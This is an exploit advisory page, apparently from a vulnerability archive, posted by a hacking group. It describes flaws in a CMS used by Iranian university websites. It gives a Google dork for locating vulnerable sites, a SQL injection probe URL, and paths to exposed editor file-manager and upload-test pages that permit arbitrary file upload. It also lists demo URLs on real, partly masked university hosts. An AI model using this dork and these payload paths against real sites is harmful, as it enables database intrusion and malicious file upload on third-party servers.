All Cms In UniverCity Iran Multiple Vulnerabilities

2015.11.19

Credit: BadBoy17Digital Boys UnderGround Team

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/fa/news.php?rid=

######################
# Exploit Title : All Cms In UniverCity Iran Multiple Vulnerabilities
# Exploit Author : Digital Boys UnderGround Team
# Vendor Homepage : www.hamayeshnegar.com
# Google Dork : inurl:/fa/news.php?rid=
# Date: 2015/19/11
# Tested On : Kali 2.0 - Chromium
#
######################
# Vulnerablity 1 : localhost/fa/news.php?rid=&#039;
# Vulnerablity 2 : localhost/class/editor/editor/filemanager/browser/default/browser.html?Connector=site.com/class/editor/editor/filemanager/connectors/php/connector.php
# Vulnerablity 3 : localhost/class/editor/editor/filemanager/connectors/uploadtest.html
#
# Demo :
#
# Vulnerablity 1 : www.cong-ebc2.muXms.ac.ir/fa/news.php?rid=15&#039;
# Vulnerablity 2 : www.cong-ebc2.mumXs.ac.ir/class/editor/editor/filemanager/connectors/uploadtest.html
# Vulnerablity 3 : http://cong-ebcX2.mXums.ac.ir//class/editor/editor/filemanager/browser/default/browser.html?Connector=http://cong-ebc2.mums.ac.ir//class/editor/editor/filemanager/connectors/php/connector.php
#
######################
# discovered by : BadBoy17
# Gmail : Digi0days@Gmail.com
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

All Cms In UniverCity Iran Multiple Vulnerabilities

Dork: inurl:/fa/news.php?rid=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.